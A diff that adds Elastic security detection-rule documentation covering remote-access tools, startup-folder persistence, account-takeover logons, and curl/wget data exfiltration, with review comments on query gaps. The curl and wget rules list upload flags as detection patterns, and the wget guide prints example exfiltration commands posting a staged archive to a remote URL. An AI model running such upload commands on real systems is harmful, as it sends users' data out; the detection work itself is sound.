"SupremoService.exe", "Supremo", + process.name == "Syncro.Overmind.Service.exe", "Splashtop", + process.name == "SyncroLive.Agent.Runner.exe", "Splashtop", + process.name == "Syncro.Installer.exe", "Splashtop", + process.name == "tacticalrmm.exe", "TacticalRMM", + process.name == "tailscale.exe", "Tailscale", + process.name == "tailscaled.exe", "Tailscale", + process.name == "teamviewer.exe", "TeamViewer", + process.name == "ticlientcore.exe", "Tiflux", + process.name == "TiAgent.exe", "Tiflux", + process.name == "ToDesk_Service.exe", "ToDesk", + process.name == "twingate.exe", "Twingate", + process.name == "tvn.exe", "TightVNC", + process.name == "tvnserver.exe", "TightVNC", + process.name == "tvnviewer.exe", "TightVNC", + process.name == "winwvc.exe", "TightVNC", + process.name like "UltraVNC*.exe", "UltraVNC", + process.name like "UltraViewer*.exe", "UltraViewer", + process.name like "AA_v*.exe", "AnyAssist", + process.name == "Velociraptor.exe", "Velociraptor", + process.name == "ToolsIQ.exe", "ToolsIQ", + process.name == "session_win.exe", "ZohoAssist", + process.name == "Zaservice.exe", "ZohoAssist", + process.name == "ZohoURS.exe", "ZohoAssist", + "" + ) +| where Esql.rmm_vendor != "" and Esql.rmm_vendor is not NULL +| stats Esql.vendor_count = count_distinct(Esql.rmm_vendor), + Esql.vendors_seen = values(Esql.rmm_vendor), + Esql.processes_executable_values = values(process.executable), + Esql.first_seen = min(@timestamp), + Esql.last_seen = max(@timestamp) + by host.name, host.id +| where Esql.vendor_count >= 2 +| sort Esql.vendor_count desc +| keep host.id, host.name, Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Remote Access Tools +** ID: T1219 +** Reference URL: https://attack.mitre.org/techniques/T1219/ +* Sub-technique: +** Name: Remote Desktop Software +** ID: T1219.002 +** 
Reference URL: https://attack.mitre.org/techniques/T1219/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-persistent-scripts-in-the-startup-directory.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-persistent-scripts-in-the-startup-directory.asciidoc new file mode 100644 index 0000000000..69f815431a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-persistent-scripts-in-the-startup-directory.asciidoc 
@@ -0,0 +1,167 @@ +[[prebuilt-rule-8-19-18-persistent-scripts-in-the-startup-directory]] +=== Persistent Scripts in the Startup Directory + +Identifies script engines creating files in the Startup folder, or the creation of script files in the Startup folder. Adversaries may abuse this technique to maintain persistence in an environment. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.file-* +* logs-windows.sysmon_operational-* +* endgame-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: Microsoft Defender for Endpoint +* Data Source: SentinelOne + +*Version*: 316 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Performance* + + +This rule may have low to medium performance impact due to the generic nature of VBS and JS scripts being loaded by Windows script engines. + + +*Investigating Persistent Scripts in the Startup Directory* + + +The Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence. + +This rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the file using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +*False positive analysis* + + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + + +*Related rules* + + +- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff +- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. 
+ - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type != "deletion" and + + /* Call attention to file extensions that may be used for malicious purposes */ + /* Optionally, Windows scripting engine processes targeting shortcut files */ + ( + file.extension : ("vbs", "vbe", "wsh", "wsf", "js", "jse", "sct", "hta", "ps1", "bat", "cmd") or + process.name : ("wscript.exe", "cscript.exe") + ) and not (startsWith(user.domain, "NT") or endsWith(user.domain, "NT")) + + /* Identify files created or changed in the startup folder */ + and file.path : ( + "?:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", + "?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Registry Run Keys / Startup Folder +** ID: T1547.001 +** Reference URL: https://attack.mitre.org/techniques/T1547/001/ +* Sub-technique: +** Name: Shortcut Modification +** ID: T1547.009 +** Reference URL: https://attack.mitre.org/techniques/T1547/009/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-account-takeover-logon-from-new-source-ip.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-account-takeover-logon-from-new-source-ip.asciidoc new file mode 100644 index 0000000000..c1ba963d93 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-account-takeover-logon-from-new-source-ip.asciidoc 
@@ -0,0 +1,113 @@ +[[prebuilt-rule-8-19-18-potential-account-takeover-logon-from-new-source-ip]] +=== Potential Account Takeover - Logon from New Source IP + +Identifies a user account that normally logs in with high volume from one source IP suddenly logging in from a different source IP. This pattern (one IP with many successful logons, another IP with very few) may indicate account takeover or use of stolen credentials from a new location. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 14m + +*Searches indices from*: now-15m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1078/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Windows Security Event Logs +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential Account Takeover - Logon from New Source IP* + + +An account that historically logs in many times from a single source IP (e.g. usual workstation or VPN) and then shows successful logons from exactly one other IP with a low count may indicate credential compromise and use from a new location (account takeover). + + +*Possible investigation steps* + + +- Confirm with the account owner whether they recently logged in from the new source IP or from a new device/location. +- Check the new source IP for reputation, geography, and whether it is expected (e.g. corporate VPN range vs unknown). +- Correlate with other alerts for the same user or source IP (e.g. logon failures, password changes, MFA changes). +- Review timeline: if the "new" IP logon is very recent compared to the high-count IP, treat as higher priority. 
+ + +*False positive analysis* + + +- Legitimate use from a second device (e.g. new laptop, second office, VPN from travel) can produce exactly two IPs with one IP having few logons. Tune threshold (e.g. max_logon >= 100) or add exclusions for known VPN/remote ranges if needed. +- Service or shared accounts that are used from multiple jump hosts or scripts may show two IPs; consider excluding known service accounts. + + +*Response and remediation* + + +- If takeover is confirmed: force password reset, revoke sessions, and enable or enforce MFA. Disable or lock the account until the user verifies identity. +- Investigate how credentials may have been compromised (phishing, breach, endpoint) and address the vector. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index +| where event.category == "authentication" and event.action == "logged-in" and winlog.event_id == "4624" and + event.outcome == "success" and winlog.logon.type in ("Network", "RemoteInteractive") and + source.ip is not null and source.ip != "127.0.0.1" and not to_string(source.ip) like "*::*" and not user.name like "*$" +| stats logon_count = COUNT(*), host_names = VALUES(host.name) by user.name, user.id, source.ip +| stats + Esql.max_logon = MAX(logon_count), + Esql.min_logon = MIN(logon_count), + Esql.unique_host_count = COUNT_DISTINCT(host_names), + Esql.host_name_values = VALUES(host_names), + Esql.source_ip_values = VALUES(source.ip), + Esql.count_distinct_source_ip = COUNT_DISTINCT(source.ip) by user.name, user.id + +// high count of logons is often associated with service account tied to a specific source.ip, if observed in use from a new source.ip it's suspicious +| where Esql.max_logon >= 1000 and (Esql.min_logon >= 1 and Esql.min_logon <= 5) and Esql.count_distinct_source_ip == 2 and Esql.unique_host_count >= 2 +| eval source.ip = MV_FIRST(Esql.source_ip_values), host.name = 
MV_FIRST(Esql.host_name_values) +| KEEP user.name, user.id, host.name, source.ip, Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-account-takeover-mixed-logon-types.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-account-takeover-mixed-logon-types.asciidoc new file mode 100644 index 0000000000..3cdb21e0d5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-account-takeover-mixed-logon-types.asciidoc 
@@ -0,0 +1,113 @@ +[[prebuilt-rule-8-19-18-potential-account-takeover-mixed-logon-types]] +=== Potential Account Takeover - Mixed Logon Types + +Identifies a user account (often a service account) that normally logs in with high volume using one logon type suddenly showing successful logons using a different logon type with low count. This pattern may indicate account takeover or use of stolen credentials from a new context (e.g. interactive or network logon where only batch/service was expected). + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 14m + +*Searches indices from*: now-15m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1078/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Windows Security Event Logs +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential Account Takeover - Mixed Logon Types* + + +A high-volume account (e.g. service account tied to a specific logon type such as Batch or Network) that also shows successful logons with a different logon type and low count may indicate credential compromise and use from a new context (account takeover or misuse). + + +*Possible investigation steps* + + +- Confirm with the account owner or service owner whether the additional logon type is expected (e.g. new automation, RDP for maintenance). +- Review which logon types appear in Esql.logon_type_values and which has the low count (likely the anomalous one). +- Correlate with other alerts for the same user (e.g. logon from new source IP, password changes, MFA changes). 
+- Check whether the account is a known service account; if so, verify if any new scripts or systems were authorized to use it. + + +*False positive analysis* + + +- Legitimate expansion of use (e.g. service account also used for occasional interactive logon for troubleshooting) can trigger this. Tune thresholds (e.g. max_logon >= 1000, min_logon <= 10) or add exclusions for known service accounts with documented multi-context use. +- New scheduled tasks or automation that use a different logon type may cause a short-lived spike in the "other" logon type; review over a longer window if needed. + + +*Response and remediation* + + +- If takeover or misuse is confirmed: force password reset, revoke sessions, rotate service account credentials, and restrict logon type or source where possible. +- Investigate how credentials may have been compromised and address the vector. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index +| WHERE event.category == "authentication" and event.action == "logged-in" and winlog.event_id == "4624" and + event.outcome == "success" and not user.id in ("S-1-5-18", "S-1-5-19", "S-1-5-20") and + to_lower(user.name) != "administrator" +| STATS logon_count = COUNT(*), host_names = VALUES(host.name) by user.name, user.id, winlog.logon.type +| STATS + Esql.max_logon = MAX(logon_count), + Esql.min_logon = MIN(logon_count), + Esql.unique_host_count = COUNT_DISTINCT(host_names), + Esql.host_name_values = VALUES(host_names), + Esql.logon_type_values = VALUES(winlog.logon.type), + Esql.count_distinct_logon_types = COUNT_DISTINCT(winlog.logon.type) by user.name, user.id + +// high count of logons is often associated with service account tied to a specific service, if observed in use with a different logon type it's suspicious +| WHERE Esql.count_distinct_logon_types >= 2 and Esql.max_logon >= 1000 and (Esql.min_logon >= 1 and 
Esql.min_logon <= 10) and Esql.unique_host_count >= 2 +| EVAL winlog.logon.type = MV_FIRST(Esql.logon_type_values), host.name = MV_FIRST(Esql.host_name_values) +| KEEP user.name, user.id, host.name, winlog.logon.type, Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-through-curl.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-through-curl.asciidoc new file mode 100644 index 0000000000..0854e3c15b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-through-curl.asciidoc 
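Review bot: The first `WHERE` of the ES|QL query drops the well-known service SIDs and the Administrator name but never excludes computer accounts, which the preceding account-takeover rule in this patch does with `not user.name like "*$"`; machine accounts routinely produce high-volume Network logons alongside lower-volume logons of another type across several hosts, so they will readily satisfy `count_distinct_logon_types >= 2`, the `min_logon`/`max_logon` band and `unique_host_count >= 2` and dominate the alert volume. Adding `and not user.name like "*$"` to that first `WHERE` keeps the rule on the user and service principals the description and investigation guide are written for, and keeps the two sibling rules consistent with each other. The exclusion of `administrator` by name is also a coverage trade-off worth stating in the false positive section, since a takeover of the built-in Administrator with a new logon type is exactly the pattern this rule describes and will not alert. The rest of the guide is consistent with the query: `Esql.logon_type_values`, which it tells the analyst to review, survives the final `KEEP`.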
@@ -0,0 +1,162 @@ +[[prebuilt-rule-8-19-18-potential-data-exfiltration-through-curl]] +=== Potential Data Exfiltration Through Curl + +Detects the use of curl to upload files to an internet server. Threat actors often will collect and exfiltrate data on a system to their C2 server for review. Many threat actors have been observed using curl to upload the collected data. Use of curl in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* +* logs-crowdstrike.fdr* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://everything.curl.dev/usingcurl/uploads +* https://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign?hl=en + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Exfiltration +* Data Source: Elastic Defend +* Resources: Investigation Guide +* Data Source: Crowdstrike +* Data Source: SentinelOne + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential Data Exfiltration Through Curl* + + +Curl is a command-line tool used for transferring data with URLs, commonly employed for legitimate data exchange tasks. However, adversaries can exploit curl to exfiltrate sensitive data by uploading compressed files to remote servers. 
The detection rule identifies suspicious curl usage by monitoring for specific command patterns and arguments indicative of data uploads, flagging abnormal activities for further investigation. + + +*Possible investigation steps* + + +- Review the process command line to confirm the presence of suspicious arguments such as "-F", "-T", "-d", or "--data*" and check for any compressed file extensions like .zip, .gz, or .tgz being uploaded to an external server. +- Investigate the parent process of the curl command to understand the context in which curl was executed, including the parent executable and its purpose. +- Examine network logs to identify the destination IP address or domain to which the data was being uploaded, and assess whether it is a known or suspicious entity. +- Check for any recent file creation or modification events on the host that match the compressed file types mentioned in the query, which could indicate data collection prior to exfiltration. +- Correlate this event with other security alerts or logs from the same host to identify any patterns of behavior that might suggest a broader compromise or data exfiltration attempt. + + +*False positive analysis* + + +- Legitimate data transfers using curl for system backups or data synchronization can trigger the rule. To manage this, identify and whitelist specific processes or scripts that are known to perform these tasks regularly. +- Automated system updates or software installations that use curl to download and upload data might be flagged. Exclude these processes by verifying their source and adding them to an exception list if they are from trusted vendors. +- Internal data transfers within a secure network that use curl for efficiency can be mistaken for exfiltration. Monitor the destination IP addresses and exclude those that are internal or known safe endpoints. +- Developers or system administrators using curl for testing or development purposes may inadvertently trigger the rule. 
Educate these users on the potential alerts and establish a process for them to notify security teams of their activities to prevent unnecessary investigations. +- Scheduled tasks or cron jobs that use curl for routine data uploads should be reviewed and, if deemed safe, added to an exception list to avoid repeated false positives. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further data exfiltration and contain the threat. +- Terminate any suspicious curl processes identified by the detection rule to stop ongoing data transfers. +- Conduct a forensic analysis of the affected system to identify any additional malicious activities or compromised data. +- Change credentials and access keys that may have been exposed or used during the incident to prevent unauthorized access. +- Notify the security operations team and relevant stakeholders about the incident for awareness and further action. +- Review and update firewall and network security rules to block unauthorized outbound traffic, especially to suspicious or unknown external servers. +- Implement enhanced monitoring and logging for curl usage and similar data transfer tools to detect and respond to future exfiltration attempts promptly. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". 
+- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. 
+ + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "ProcessRollup2", "start") and +process.name == "curl" and ?process.parent.executable != null and +( + process.args in ("-T", "--upload-file") or + ( + (process.args in ("-F", "-d", "--form") or process.args like "--data*") and process.command_line like "*@*" + ) +) and +( + process.command_line like ("*http:*", "*https:*", "*ftp:*", "*ftps:*") or + process.command_line regex ".*[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}.*" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Alternative Protocol +** ID: T1048 +** Reference URL: https://attack.mitre.org/techniques/T1048/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-through-wget.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-through-wget.asciidoc new file mode 100644 index 0000000000..02e576a8d1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-through-wget.asciidoc 
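Review bot: Two investigation steps in this guide refer to "compressed file extensions like .zip, .gz, or .tgz" and to "the compressed file types mentioned in the query", but the version 5 query below matches only on the upload flags (`-T`/`--upload-file`, or `-F`/`-d`/`--form`/`--data*` combined with an `@` in the command line) and on a URL scheme or dotted-quad pattern, with no file-type terms at all, so the guide appears to have been written against an earlier query and now points analysts at a filter that does not exist. Rewriting the first step to match the logic, e.g. "Review the process command line for an upload argument (`-T`/`--upload-file`, or `-F`/`-d`/`--form`/`--data*` with an `@file` reference) and identify the local file being sent and the destination URL or IP", and dropping "mentioned in the query" from the file-creation step, keeps the guide honest about what triggered the alert. It is also worth a sentence in the false positive section that the IPv4 regex is unanchored, so any dotted-quad in an argument (a version string, a file name) satisfies the destination branch, since that explains a class of alerts the current text does not.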
@@ -0,0 +1,167 @@ +[[prebuilt-rule-8-19-18-potential-data-exfiltration-through-wget]] +=== Potential Data Exfiltration Through Wget + +Detects the use of wget to upload files to an internet server. Threat actors often will collect data on a system and attempt to exfiltrate it back to their command and control servers. Use of wget in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* endgame-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://gtfobins.github.io/gtfobins/wget/ +* https://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign?hl=en + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Exfiltration +* Data Source: Auditd Manager +* Data Source: Elastic Defend +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Data Source: Elastic Endgame +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential Data Exfiltration Through Wget* + + +This rule flags Linux processes that launch wget with options that upload a local file via HTTP POST, a behavior used to exfiltrate staged data to an external server. 
Attackers gather files, compress them in /tmp, then execute wget --post-file=/tmp/loot.tar.gz https://example.com/upload from a non-interactive shell or cron job to covertly push the archive out over standard web traffic. + + +*Possible investigation steps* + + +- Pull the full command line to extract the posted file path, verify the file still exists, capture size/timestamps, and hash its contents to gauge sensitivity and origin. +- Review the process tree and session context (parent, user, TTY, cron/systemd/container) and correlate with recent logins or scheduler entries to determine whether this was automated or a remote shell action. +- Enrich the destination endpoint with DNS, WHOIS, certificate, proxy, and egress firewall logs, and check for prior communications from this host to the same domain/IP to assess legitimacy. +- Pivot 30–60 minutes prior on the host/user for staging activity such as tar/gzip in /tmp, bulk file collection, or discovery commands, and interrogate shell history and filesystem events tied to the posted file. +- If the file was removed post-upload, attempt recovery from EDR or backups and estimate exfil volume and content types via proxy or egress gateway logs to determine impact and drive containment. + + +*False positive analysis* + + +- A maintenance or monitoring script run via cron posts log archives or configuration snapshots using wget --post-file to an internal HTTP endpoint for routine diagnostics. +- An administrator or developer testing a web form or API uses wget --body-file to POST a sample file during troubleshooting, producing a benign one-off event. + + +*Response and remediation* + + +- Immediately isolate the host, terminate the offending wget process, block outbound HTTP(S) to the destination domain/IP seen in the command wget --post-file=/path/to/file https://example.com/upload, and quarantine the posted file path and its parent directory. 
+- Identify and disable any cron, systemd, or shell script that invoked wget with --post-file or --body-file (e.g., entries in /etc/cron.d/, user crontabs, or /home/user/.local/bin/upload.sh), delete the script, and revoke the invoking account’s API tokens and SSH keys. +- Remove staged archives and temp files referenced in the upload (e.g., /tmp/loot.tar.gz and /var/tmp/*.gz), delete companion tooling or collection scripts found alongside them, and reimage the host if system integrity cannot be assured. +- If the posted content includes credentials, source code, or customer data, rotate affected passwords/keys, invalidate tokens, notify data owners, and restore impacted systems or files from known-good backups. +- Escalate to incident response and initiate wider containment if the destination domain/IP is not owned by the organization or resolves to an anonymizing/VPS service, if multiple hosts exhibit wget --post-file from non-interactive sessions, or if the uploader executed as root. +- Harden by enforcing SELinux/AppArmor policies that restrict wget/curl from posting files, requiring egress web proxy allowlists for HTTP POST destinations, adding detections for wget --post-file/--body-file and curl --upload-file/-F, and removing wget from systems where it is unnecessary. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. 
+ + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer 